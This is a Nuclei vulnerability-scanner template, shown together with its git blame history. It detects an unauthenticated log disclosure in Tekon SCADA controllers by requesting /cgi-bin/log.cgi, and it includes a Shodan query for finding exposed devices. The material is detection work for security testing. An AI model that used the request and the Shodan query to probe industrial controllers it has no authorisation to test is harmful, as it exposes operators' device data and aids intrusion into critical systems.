nuclei-templates/vulnerabilities/other/tekon-info-leak.yaml

id: tekon-info-leak

info:
  name: Tekon - Unauthenticated Log Leak
  author: gy741
  severity: low
  description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device
  reference:
    - https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38
  metadata:
    shodan-query: title:"контроллер"
  tags: tekon,exposure,unauth

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cgi-bin/log.cgi'

    max-size: 2048
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "-- Logs begin at"
          - "end at"
        condition: and

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
Create tekon-info-leak.yaml A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-03-18 10:38:44 +00:00			`id: tekon-info-leak`

			`info:`
			`name: Tekon - Unauthenticated Log Leak`
			`author: gy741`
Update tekon-info-leak.yaml 2022-03-21 11:06:39 +00:00			`severity: low`
			`description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38`
Update tekon-info-leak.yaml 2022-03-21 11:06:39 +00:00			`metadata:`
			`shodan-query: title:"контроллер"`
			`tags: tekon,exposure,unauth`
Create tekon-info-leak.yaml A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-03-18 10:38:44 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/cgi-bin/log.cgi'`

Update tekon-info-leak.yaml 2022-03-21 11:06:39 +00:00			`max-size: 2048`
Create tekon-info-leak.yaml A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-03-18 10:38:44 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update tekon-info-leak.yaml 2022-03-21 11:06:39 +00:00			`part: body`
Create tekon-info-leak.yaml A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-03-18 10:38:44 +00:00			`words:`
			`- "-- Logs begin at"`
			`- "end at"`
			`condition: and`
Update tekon-info-leak.yaml 2022-03-21 11:06:39 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- "text/plain"`

			`- type: status`
			`status:`
			`- 200`